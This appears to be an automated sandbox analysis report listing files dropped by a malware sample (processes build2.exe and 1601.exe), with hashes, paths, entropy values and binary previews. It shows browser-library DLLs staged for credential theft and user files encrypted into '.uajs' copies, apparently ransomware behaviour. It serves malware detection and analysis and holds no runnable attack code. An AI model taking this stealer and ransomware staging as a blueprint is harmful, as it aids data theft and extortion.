Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe, Detection: malicious, Browse Filename: Grkradw6vd.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.26032.23589.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.12246.12715.exe, Detection: malicious, Browse Filename: 8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exe, Detection: malicious, Browse Filename: e8iuAWz9pB.exe, Detection: malicious, Browse Filename: gVnbOPz4F2.exe, Detection: malicious, Browse Filename: 5zq2Yob8xh.exe, Detection: malicious, Browse Filename: WAhYftpepO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\SystemID\PersonalID.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.830183125768361
Encrypted:	false
SSDEEP:	3:CHokcMRfsnrKY3kqy:wowfw5Xy
MD5:	7D6DADE875419F54546504BBF63D1EBC
SHA1:	54F5D5D8E517B6E78FC1E7F90EC2C54A2331C4E3
SHA-256:	3D34E80E2B18F8479A0655A77C51DBB0B91B625DC057888C2876DE7BBC46B21F
SHA-512:	152932ACE9751DD4FF9C1AABD002E8C552461C67355A65E741703E6AE1F206DEAD69ABA2E151E75769A31C44F39488D0D82CCD5A096DADAD86503713F7686F28
Malicious:	false
Preview:	TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf..

C:\Users\user\.curlrc

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	342
Entropy (8bit):	7.19403367619668
Encrypted:	false
SSDEEP:	6:KWbjWj0rTuvSAobZhMxi98jYqmIw4l37m/nMJoHw/h8ONowfw5XeWcii96Z:NfCmTuvSAobHmY8kD3+qM6pONoqw1ciD
MD5:	434B8ADF1182378074054A4B164F5530
SHA1:	21E4DF1332F9FAFC8C36221E7103EDDAFEC17FC9
SHA-256:	66E8B6F6D9A8B1494FF90BE5C8711EB4877A286C53AF61ED9FF44D8BB7AEF7A5
SHA-512:	661F35BBB514937C2E8A648BA1BDF673CB5A14D6A45F84DFAB6EC988D320655D6CF4E3A3E8605C7C825D72CB3568579B8EFD05A8E4C4F21DF749AE3FB6EFE506
Malicious:	false
Preview:	insec.ND...8.cJ12....>._.s....Ag.........2...L...=Z.....h.....i.7...::.~..l=p/tbl..8Q>..-A.p........$....71.....X@......:........@/.Xg>@....@j..uVC....".8.Q9..$-....T.d.{.~.Ynz....s=.....U.M..a.[..-..}.D..r.6.RH3.A..,!..U..<.5@..l...m.m......Wp\.^...l.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\.curlrc.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	342
Entropy (8bit):	7.19403367619668
Encrypted:	false
SSDEEP:	6:KWbjWj0rTuvSAobZhMxi98jYqmIw4l37m/nMJoHw/h8ONowfw5XeWcii96Z:NfCmTuvSAobHmY8kD3+qM6pONoqw1ciD
MD5:	434B8ADF1182378074054A4B164F5530
SHA1:	21E4DF1332F9FAFC8C36221E7103EDDAFEC17FC9
SHA-256:	66E8B6F6D9A8B1494FF90BE5C8711EB4877A286C53AF61ED9FF44D8BB7AEF7A5
SHA-512:	661F35BBB514937C2E8A648BA1BDF673CB5A14D6A45F84DFAB6EC988D320655D6CF4E3A3E8605C7C825D72CB3568579B8EFD05A8E4C4F21DF749AE3FB6EFE506
Malicious:	false
Preview:	insec.ND...8.cJ12....>._.s....Ag.........2...L...=Z.....h.....i.7...::.~..l=p/tbl..8Q>..-A.p........$....71.....X@......:........@/.Xg>@....@j..uVC....".8.Q9..$-....T.d.{.~.Ynz....s=.....U.M..a.[..-..}.D..r.6.RH3.A..,!..U..<.5@..l...m.m......Wp\.^...l.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	data
Category:	modified
Size (bytes):	624
Entropy (8bit):	7.64116604380642
Encrypted:	false
SSDEEP:	12:kNfwWRbsJBGKZX1Cz7z1VXLr8kQYSSI/0msoqw1cii9a:it7KZXkHJVv8knSSI/f8w1bD
MD5:	3B34098B8E695AF7B7F771F4475E15AF
SHA1:	3FC46CAD42F591801B1D0C446590C4E0C28E8931
SHA-256:	AD13AEF1FDFDD0729D24DDC55A72BF650AA12B4C6501B52E54810B9CBA97986E
SHA-512:	AB6F5831CB79787A1BE1C0981056F67DF2A28CEBB34C9E13FF5AC4EA8B72B99F87D5F2FBD71166736651F9BF00E8AF6E32CD1E256746F463248E9FBBCE0EE8CA
Malicious:	false
Preview:	2023/......!xy......g...3...<4..h..3...i..B.......,.._...X..#.(.....~....y...c.?.Z...SU0x.}l.5.L.Ll..[E.t...t..../d..!..Ux....M....c .>v......q..2..4...d.'.Gb.@..gl\|.z..!.....1h.~...=..P.O.........W<..././..DE..c....\.....2X oU...............o.!s.E.v.J....3..^..Rm..L...th+`.@.<...,.P..\|...Lp^.s...........O...D....<......].....f..}=...Z..!<...9..o..\&.m$......9.9n...!....:...f..^.o.]D....V...(..>4\.U/..W.........iC....x....b..B...R...3E.oM.H.@.)............1D~.Ddl8......d._..2.a.&..t..(:E..MZ..b .. .._..n..M.P.~TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	624
Entropy (8bit):	7.64116604380642
Encrypted:	false
SSDEEP:	12:kNfwWRbsJBGKZX1Cz7z1VXLr8kQYSSI/0msoqw1cii9a:it7KZXkHJVv8knSSI/f8w1bD
MD5:	3B34098B8E695AF7B7F771F4475E15AF
SHA1:	3FC46CAD42F591801B1D0C446590C4E0C28E8931
SHA-256:	AD13AEF1FDFDD0729D24DDC55A72BF650AA12B4C6501B52E54810B9CBA97986E
SHA-512:	AB6F5831CB79787A1BE1C0981056F67DF2A28CEBB34C9E13FF5AC4EA8B72B99F87D5F2FBD71166736651F9BF00E8AF6E32CD1E256746F463248E9FBBCE0EE8CA
Malicious:	false
Preview:	2023/......!xy......g...3...<4..h..3...i..B.......,.._...X..#.(.....~....y...c.?.Z...SU0x.}l.5.L.Ll..[E.t...t..../d..!..Ux....M....c .>v......q..2..4...d.'.Gb.@..gl\|.z..!.....1h.~...=..P.O.........W<..././..DE..c....\.....2X oU...............o.!s.E.v.J....3..^..Rm..L...th+`.@.<...,.P..\|...Lp^.s...........O...D....<......].....f..}=...Z..!<...9..o..\&.m$......9.9n...!....:...f..^.o.]D....V...(..>4\.U/..W.........iC....x....b..B...R...3E.oM.H.@.)............1D~.Ddl8......d._..2.a.&..t..(:E..MZ..b .. .._..n..M.P.~TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	668
Entropy (8bit):	7.644450277615991
Encrypted:	false
SSDEEP:	12:kmXMQBQkwCdTVhjS72TCxKJ4fmXiVW6/5a7ZUazLMxoqw1cii9a:9XMOHw4JI72f+OXiVWWfw1bD
MD5:	D8D537C14AC32ED2E50FAA74883734A2
SHA1:	68623737AA0A150CD09D12D0AFF7F0E7C249301E
SHA-256:	A0A662F7BF1B12CC0651B5A29A8CB7B91887514C0C7E7452DFCEC89F587E6BD9
SHA-512:	F4238E716ECEB8E651536A33050172E73238FC8B715FFEABC157319F496B4B30FD4255E8B9E20B9BD91D110FB32A28777EB87315E9196FD5C654C2A4116E20F3
Malicious:	false
Preview:	2023/.T.jYXHQ@.9......%.q.g=.n.$C+aJ\|..z.....v.~..Ct..].shn.OyO.....RvWD...}.Gh.6vfR.H.(].!.\.Y...K...+........W.B#a(....{..z.X..J..Z....%xG....+.2...D..3.r.< "...E_.K'.V...#i.?,.t...6...>"\h...x..i......Y...*...i.d.S.....O.....8e..3......3....\5.......%...:.2.!....7.....":...,...^.F.....`2.@,VG..........}.....-.Rb.;i.+zj..qg...._T/.....59..Na.M$Z.d6h...d./.%8...B..l....@......o.A...F....-...U........q.....<7.^..m...-,v..T.Z.P......lO.!3\;..oPRB.K..f..3../1...DL........tO..M8r9#...:...N..47v/7T.u+...C.\|.I..Wh{...n\|F....i....xp.....k...bx....zVv...w$L..D..w..\7.!TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	668
Entropy (8bit):	7.644450277615991
Encrypted:	false
SSDEEP:	12:kmXMQBQkwCdTVhjS72TCxKJ4fmXiVW6/5a7ZUazLMxoqw1cii9a:9XMOHw4JI72f+OXiVWWfw1bD
MD5:	D8D537C14AC32ED2E50FAA74883734A2
SHA1:	68623737AA0A150CD09D12D0AFF7F0E7C249301E
SHA-256:	A0A662F7BF1B12CC0651B5A29A8CB7B91887514C0C7E7452DFCEC89F587E6BD9
SHA-512:	F4238E716ECEB8E651536A33050172E73238FC8B715FFEABC157319F496B4B30FD4255E8B9E20B9BD91D110FB32A28777EB87315E9196FD5C654C2A4116E20F3
Malicious:	false
Preview:	2023/.T.jYXHQ@.9......%.q.g=.n.$C+aJ\|..z.....v.~..Ct..].shn.OyO.....RvWD...}.Gh.6vfR.H.(].!.\.Y...K...+........W.B#a(....{..z.X..J..Z....%xG....+.2...D..3.r.< "...E_.K'.V...#i.?,.t...6...>"\h...x..i......Y...*...i.d.S.....O.....8e..3......3....\5.......%...:.2.!....7.....":...,...^.F.....`2.@,VG..........}.....-.Rb.;i.+zj..qg...._T/.....59..Na.M$Z.d6h...d./.%8...B..l....@......o.A...F....-...U........q.....<7.^..m...-,v..T.Z.P......lO.!3\;..oPRB.K..f..3../1...DL........tO..M8r9#...:...N..47v/7T.u+...C.\|.I..Wh{...n\|F....i....xp.....k...bx....zVv...w$L..D..w..\7.!TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.735870169463937
Encrypted:	false
SSDEEP:	24:YKWNv2BQXYI6sLUL6Pj2+CArFfOHUKkw1bD:YXOBxMUsTCARfUUKkyD
MD5:	678F058DCDAEB5DC317A1F29AC5E02FD
SHA1:	D6338D4926FA5ACF76FB0C85D51DCF5F1F7260E4
SHA-256:	878821F4A718CD038D936C28D55F916D0FC49395F1F680F6DB7A3BE0F4B1E78A
SHA-512:	069A4753F94DE002E37D512706E1604639EFFB30F3DBBB38233AA724C12082F6EC288365BEAA58E192856CD69110F71F027D14A54BCFFF8D439C53591305AA28
Malicious:	false
Preview:	{"os_..BCM.2hV.....j..e.... `=!kRs.Y?...6.v.....G...G.( 4.:QC..[....b$`.P......H.0}.@f.......0.."..^..G..c....pU.........w.Q...}FU..mW.l>..56),",H........r.t..H.8..v..k..\|]\|Z..R.'3......P6..0.......... .].y....%....WPg.........;.t.....!\...o%.;X..t.:....X/.#.....o.q`.VI.....&Kj.....M...r'a)_I...6...8+..Jo\|..IT..`F.%..n..K.k.s.n..p..$....<.Q.Q.#.Y../.-.;r.2r.[.._Y.;..9.9...]..+8k..$:O.....M...$T.;....p...{(K...F..M).t.a\.P....w.._...{;...{.....0_("..T.....u.3.u7~Q..).......e..P)r.p^r.".. ..W...gJ...9...L..q.<r.2.jE.[8N.W..I.f.W8c}I.0... ..p?4.5F......I..X..F.....l..z.....>.....AA..:.g..t..V.).V{...)X..t?Y .,...t.B'VV."....b...eHKO..T.\t`.A..sL..O... vBaZ.*.ZH..`2.wG...%MDV/...Kq...\..U.......;.".TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.735870169463937
Encrypted:	false
SSDEEP:	24:YKWNv2BQXYI6sLUL6Pj2+CArFfOHUKkw1bD:YXOBxMUsTCARfUUKkyD
MD5:	678F058DCDAEB5DC317A1F29AC5E02FD
SHA1:	D6338D4926FA5ACF76FB0C85D51DCF5F1F7260E4
SHA-256:	878821F4A718CD038D936C28D55F916D0FC49395F1F680F6DB7A3BE0F4B1E78A
SHA-512:	069A4753F94DE002E37D512706E1604639EFFB30F3DBBB38233AA724C12082F6EC288365BEAA58E192856CD69110F71F027D14A54BCFFF8D439C53591305AA28
Malicious:	false
Preview:	{"os_..BCM.2hV.....j..e.... `=!kRs.Y?...6.v.....G...G.( 4.:QC..[....b$`.P......H.0}.@f.......0.."..^..G..c....pU.........w.Q...}FU..mW.l>..56),",H........r.t..H.8..v..k..\|]\|Z..R.'3......P6..0.......... .].y....%....WPg.........;.t.....!\...o%.;X..t.:....X/.#.....o.q`.VI.....&Kj.....M...r'a)_I...6...8+..Jo\|..IT..`F.%..n..K.k.s.n..p..$....<.Q.Q.#.Y../.-.;r.2r.[.._Y.;..9.9...]..+8k..$:O.....M...$T.;....p...{(K...F..M).t.a\.P....w.._...{;...{.....0_("..T.....u.3.u7~Q..).......e..P)r.p^r.".. ..W...gJ...9...L..q.<r.2.jE.[8N.W..I.f.W8c}I.0... ..p?4.5F......I..X..F.....l..z.....>.....AA..:.g..t..V.).V{...)X..t?Y .,...t.B'VV."....b...eHKO..T.\t`.A..sL..O... vBaZ.*.ZH..`2.wG...%MDV/...Kq...\..U.......;.".TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	3726
Entropy (8bit):	7.945395251130677
Encrypted:	false
SSDEEP:	96:FTw+ivXPYFaDA9fj7pjBMJdUEJwpKrRHXgl/RbQla:FTwLhsxVjG1to
MD5:	4F7DF57413C5475FA91EDEB98FC1A0AD
SHA1:	B7E17922F6DE88B8D296D91904D2369AE1F97F6B
SHA-256:	1C3B1678BA569D27071B2F000EFDE2295D57B0A4262C94BA28DB9F49B1DE8EA8
SHA-512:	ADFF3413BA76E46BBB0B7920374856B48402957B1BC3551D7BCE5F745B4CD5CE3ADDCC79F8F7FD26576BF24CCF641A3458712AFA8A436D9F06AF880C32F05D4D
Malicious:	false
Preview:	...#.'P.@g...AR......J.Z..5..j0...t....'.e....'.L..h.Q.z...z....F...o+.K......u.s....RG..h.<..X2.k.G.h.s.cJ.-4..\|..3M.b4?f.(..-..c=...:)..\:2nJE&...t.".'..;8.>(Vl....jG....G.Yn....E..K.#...Y...[.Dw.B/`xS."..LglN..007.:Y.Y.#......g%.eD.."...8(...+Lg...P......3....o.....z..J.{.zk.T..7 QM..].P~?..q8.A...5.h.>(ol~..q.&.....i.'.f.&.M.Z....M.A..ej!R.]+....L:.d{....I..U....@c(....#".d...bc.....3..]..?..7.D;.i....!.-+.y$s..S T.Y...T..l{..@..-.y......gE;.R@uM...##$..Hd\|.-e&..D.P.:.{l[.(.........#O...7b....k/I].........>....z..G. ...?...)..A $KI.'Q.1.)....>\|.i..G....5....m.k9....k..h......'..mc..J...VOo......@.+..T'.uL..=......u....ZR;E.\..........@M..$.2'.\cI..].$qz.j.;XXB..,\|.../3.h....y@.p...E.i.._....#4..........d'./,....t.)@@.....kA.9.M..q.J.WU...3.>r.'j..(r..@.(.i.{".,.Y\|.!l......S,).g.6.S...tM.3 ..l.0....!."..[...2g.lwk.P..m.y.<.n.M..z...J.x.Fz........i1.#X..8..b ./.I..(...@.......\|..H....u.....).._..N...e/%3su.b.,....x..2l...=.#"..

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	3726
Entropy (8bit):	7.945395251130677
Encrypted:	false
SSDEEP:	96:FTw+ivXPYFaDA9fj7pjBMJdUEJwpKrRHXgl/RbQla:FTwLhsxVjG1to
MD5:	4F7DF57413C5475FA91EDEB98FC1A0AD
SHA1:	B7E17922F6DE88B8D296D91904D2369AE1F97F6B
SHA-256:	1C3B1678BA569D27071B2F000EFDE2295D57B0A4262C94BA28DB9F49B1DE8EA8
SHA-512:	ADFF3413BA76E46BBB0B7920374856B48402957B1BC3551D7BCE5F745B4CD5CE3ADDCC79F8F7FD26576BF24CCF641A3458712AFA8A436D9F06AF880C32F05D4D
Malicious:	false
Preview:	...#.'P.@g...AR......J.Z..5..j0...t....'.e....'.L..h.Q.z...z....F...o+.K......u.s....RG..h.<..X2.k.G.h.s.cJ.-4..\|..3M.b4?f.(..-..c=...:)..\:2nJE&...t.".'..;8.>(Vl....jG....G.Yn....E..K.#...Y...[.Dw.B/`xS."..LglN..007.:Y.Y.#......g%.eD.."...8(...+Lg...P......3....o.....z..J.{.zk.T..7 QM..].P~?..q8.A...5.h.>(ol~..q.&.....i.'.f.&.M.Z....M.A..ej!R.]+....L:.d{....I..U....@c(....#".d...bc.....3..]..?..7.D;.i....!.-+.y$s..S T.Y...T..l{..@..-.y......gE;.R@uM...##$..Hd\|.-e&..D.P.:.{l[.(.........#O...7b....k/I].........>....z..G. ...?...)..A $KI.'Q.1.)....>\|.i..G....5....m.k9....k..h......'..mc..J...VOo......@.+..T'.uL..=......u....ZR;E.\..........@M..$.2'.\cI..].$qz.j.;XXB..,\|.../3.h....y@.p...E.i.._....#4..........d'./,....t.)@@.....kA.9.M..q.J.WU...3.>r.'j..(r..@.(.i.{".,.Y\|.!l......S,).g.6.S...tM.3 ..l.0....!."..[...2g.lwk.P..m.y.<.n.M..z...J.x.Fz........i1.#X..8..b ./.I..(...@.......\|..H....u.....).._..N...e/%3su.b.,....x..2l...=.#"..

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	656
Entropy (8bit):	7.637181119009858
Encrypted:	false
SSDEEP:	12:k3rX+TdQQEst09vFig2fq5SR6r7XHwBsbC6osC5SsiOQE5rxbFSyuoqw1cii9a:4rwQQE1vYvtR6PXwSkRH5rvSrw1bD
MD5:	549AC5C0E11BF58B59F9A33C00F2C86E
SHA1:	1DD407D4C9E1CFD48D6614D7E19E038013ED731D
SHA-256:	BCD44554DE76398154E3D7C950AA1EC2F66DF1630F9608D5173529BDF81DC902
SHA-512:	1CE5DAD947A4F3E07E9D34819040AAD84B26DC76DA232DF0A2ED1CC87C164BE39526B9D5BA2C37A933FCD3888F3DD519FED0D8D87FDC89F3E8FBC034BCDDABCB
Malicious:	false
Preview:	2023/=.....I.m^............p.Z....l.. ..].E. c.E.&/7VK.tK.G.G...k.Mx....7FL4...[.r ...\:..R..c.Pzt.i..Y.h...p..)U..l.....4#....=...}.8.L....h?.!.U..M.ZI..X_.....%.....>.+RH.._$A.LhLs.x...q..&.r1.+..d.1.j.....-AT..b\|.+x.t..m...7o....'x..Is.....W....J....&...16X.B.{?.a.UY8...J,~.s.t.3......h.2Lm.>.w!5X.!_...A..x....t..z]i...v.8..f.#V96(..YzM.._..'.....Mw..y..b.`x.O...e..n....mC\.Q27....TI.y....g.s.i/..yC....n..=..0+....f.]>..q.3.........6..6r.....Vs.k.... ..V9........i....A.3/..T.c..C.....;.S..O\':..]...AE..m.2y.FaY(/.si..m.2...mTkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	656
Entropy (8bit):	7.637181119009858
Encrypted:	false
SSDEEP:	12:k3rX+TdQQEst09vFig2fq5SR6r7XHwBsbC6osC5SsiOQE5rxbFSyuoqw1cii9a:4rwQQE1vYvtR6PXwSkRH5rvSrw1bD
MD5:	549AC5C0E11BF58B59F9A33C00F2C86E
SHA1:	1DD407D4C9E1CFD48D6614D7E19E038013ED731D
SHA-256:	BCD44554DE76398154E3D7C950AA1EC2F66DF1630F9608D5173529BDF81DC902
SHA-512:	1CE5DAD947A4F3E07E9D34819040AAD84B26DC76DA232DF0A2ED1CC87C164BE39526B9D5BA2C37A933FCD3888F3DD519FED0D8D87FDC89F3E8FBC034BCDDABCB
Malicious:	false
Preview:	2023/=.....I.m^............p.Z....l.. ..].E. c.E.&/7VK.tK.G.G...k.Mx....7FL4...[.r ...\:..R..c.Pzt.i..Y.h...p..)U..l.....4#....=...}.8.L....h?.!.U..M.ZI..X_.....%.....>.+RH.._$A.LhLs.x...q..&.r1.+..d.1.j.....-AT..b\|.+x.t..m...7o....'x..Is.....W....J....&...16X.B.{?.a.UY8...J,~.s.t.3......h.2Lm.>.w!5X.!_...A..x....t..z]i...v.8..f.#V96(..YzM.._..'.....Mw..y..b.`x.O...e..n....mC\.Q27....TI.y....g.s.i/..yC....n..=..0+....f.]>..q.3.........6..6r.....Vs.k.... ..V9........i....A.3/..T.c..C.....;.S..O\':..]...AE..m.2y.FaY(/.si..m.2...mTkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	388
Entropy (8bit):	7.291388867211743
Encrypted:	false
SSDEEP:	12:DRw1SgfsI4bSN4C2aWPcm2E9W3MJNAwoqw1cii9a:d8Sg9ZmNKE9MMX9w1bD
MD5:	9A3F26E5C06099CA89DFA34FB5F2692E
SHA1:	AE3DB3173A9F48986BC6DC6EDDA88113850DC8D1
SHA-256:	5FE8A6379D2B131B3CF22088688B3E537F0D5B1A8608480BFCF868B6C85C06FE
SHA-512:	90E677944F50CC2BCD776123D55C9AF31A55CF4641F7591862BC00436A8FB459C78FDFF19DCC46AE890B305B965B1FDF938FB54EE6D5AE3255B0F47EB515B564
Malicious:	false
